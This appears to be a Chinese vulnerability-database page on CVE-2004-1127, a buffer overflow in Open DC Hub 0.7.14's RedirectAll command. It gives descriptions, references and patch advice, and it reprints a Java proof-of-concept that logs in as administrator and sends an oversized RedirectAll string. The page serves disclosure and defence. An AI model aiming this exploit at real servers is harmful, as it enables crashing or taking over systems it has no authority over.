CVE-2004-1127
CVSS10.0
发布时间 :2005-01-10 00:00:00
修订时间 :2016-10-17 22:51:26
NMCOE    

[原文]Buffer overflow in Open Dc Hub 0.7.14 allows remote attackers, with administrator privileges, to execute arbitrary code via a long RedirectAll command.


[CNNVD]OpenDCHub RedirectALL 缓冲区溢出漏洞(CNNVD-200501-212)

        Open DC Hub是一款用于直连网络的HUB软件。
        Open DC Hub 0.7.14中存在缓冲区溢出漏洞。
        具有管理员权限的远程攻击者可以通过超长的RedirectAll命令,利用此漏洞执行任意代码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1127
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1127
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-212
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/029383.html
(UNKNOWN)  FULLDISC  20041124 Buffer Overflow in Open Dc Hub 0.7.14
http://marc.info/?l=bugtraq&m=110144606411674&w=2
(UNKNOWN)  BUGTRAQ  20041124 Buffer Overflow in Open Dc Hub 0.7.14
http://www.gentoo.org/security/en/glsa/glsa-200411-37.xml
(UNKNOWN)  GENTOO  GLSA-200411-37
http://www.securityfocus.com/bid/11747
(VENDOR_ADVISORY)  BID  11747
http://xforce.iss.net/xforce/xfdb/18254
(VENDOR_ADVISORY)  XF  open-hub-redirectall-bo(18254)

- 漏洞信息

OpenDCHub RedirectALL 缓冲区溢出漏洞
危急 缓冲区溢出
2005-01-10 00:00:00 2005-10-20 00:00:00
远程  
        Open DC Hub是一款用于直连网络的HUB软件。
        Open DC Hub 0.7.14中存在缓冲区溢出漏洞。
        具有管理员权限的远程攻击者可以通过超长的RedirectAll命令,利用此漏洞执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://sourceforge.net/projects/opendchub/files/

- 漏洞信息 (24774)

Open DC Hub 0.7.14 Remote Buffer Overflow Vulnerability (EDBID:24774)
multiple remote
2004-11-24 Verified
0 Donato Ferrante
N/A [点击下载]
source: http://www.securityfocus.com/bid/11747/info

A remote buffer overflow vulnerability reportedly affects the Open DC Hub. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into finite process buffers.

An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.


/* 
   Open Dc Hub (0.7.14) - Buffer Overflow - Proof Of Concept
   Coded by: Donato Ferrante
*/



import java.net.Socket;
import java.net.UnknownHostException;
import java.net.SocketTimeoutException;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.PrintStream;



public class OpenDcHub0714_BOF_poc {


	private static int PORT  = 53696;
	private static int MAXSZ = 512;
        private static String VERSION = "0.1";

	public static void main(String [] args){

	   System.out.println(
			      "\n\n" +
			      "Open Dc Hub - Buffer Overflow - Proof Of Concept\n" +
			      "Version: " + VERSION + "\n"      +
			      "coded by: Donato Ferrante\n"     +
			      "e-mail: fdonato@autistici.org\n" +
			      "web: www.autistici.org/fdonato\n\n"
           );

		if(args.length <= 1){
			System.out.println(
					"Usage: java OpenDcHub0714_BOF_poc <host> <port> <admin_password>\n" +
					"Note:  default port is 53696.\n"
					);
			System.exit(-1);
		}

		String host = args[0];
		String admin_password = args[args.length - 1];
		int port = PORT;

		try{
			if(args.length > 2)
				port = Integer.parseInt(args[1]);
		}catch(Exception e){ port = PORT; }

		try{
		
			Socket socket = new Socket(host, port);
			socket.setSoTimeout(10000);
			BufferedReader in_stream  = new BufferedReader(new InputStreamReader(socket.getInputStream()));
			PrintStream out_stream    = new PrintStream(socket.getOutputStream());

			System.out.println(in_stream.readLine());
			System.out.println(in_stream.readLine());
			System.out.println(in_stream.readLine());
			System.out.println(in_stream.readLine());

			System.out.println("Logging...");
			out_stream.println("$adminpass " + admin_password +"|\n");

			in_stream.readLine();
			String err = in_stream.readLine();

			if(err.toLowerCase().indexOf("bad") >= 0){
				System.out.println("Login failed...");
				System.out.println("Exiting...");
				System.exit(-1);
			}
			else
				System.out.println("Logged in...");

			
			System.out.println("Building test string to inject...");
			String buff = build();
			Thread.sleep(1500);

			System.out.println("Injecting test string...");
			out_stream.println(buff);
			Thread.sleep(1500);

			System.out.println("Proof_Of_Concept terminated.");

		}catch(SocketTimeoutException ste){System.out.println("Socket timeout."); System.exit(-1);}
		 catch(UnknownHostException uhe){ System.out.println("Host: " + host + " unknown.."); System.exit(-1); }
                 catch(InterruptedException ie){ System.out.println("Thread warning...");}
                 catch(Exception ioe){ System.out.println("Unable to create the socket!"); System.exit(-1);}


	}





	private static String build(){

		String over = "";
		for(int i = 0; i < MAXSZ; i++)
			over += 0x61;
		
		String ret = "$RedirectAll " + over + "|\n";
		return ret;
	}


}
		

- 漏洞信息

12137
Open DC Hub RedirectAll Value Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in Open DC Hub. The product fails to properly check the size of a passed argument to the RedirectAll command resulting in a buffer overflow. With a specially crafted request, an attacker can execute code on the affected system.

- 时间线

2004-11-24 Unknow
2004-11-24 Unknow

- 解决方案

Upgrade to version 0.7.14-r2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Gentoo Linux has provided an updated package for its users. Instructions for installing this package are contained in the referenced Gentoo advisory.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站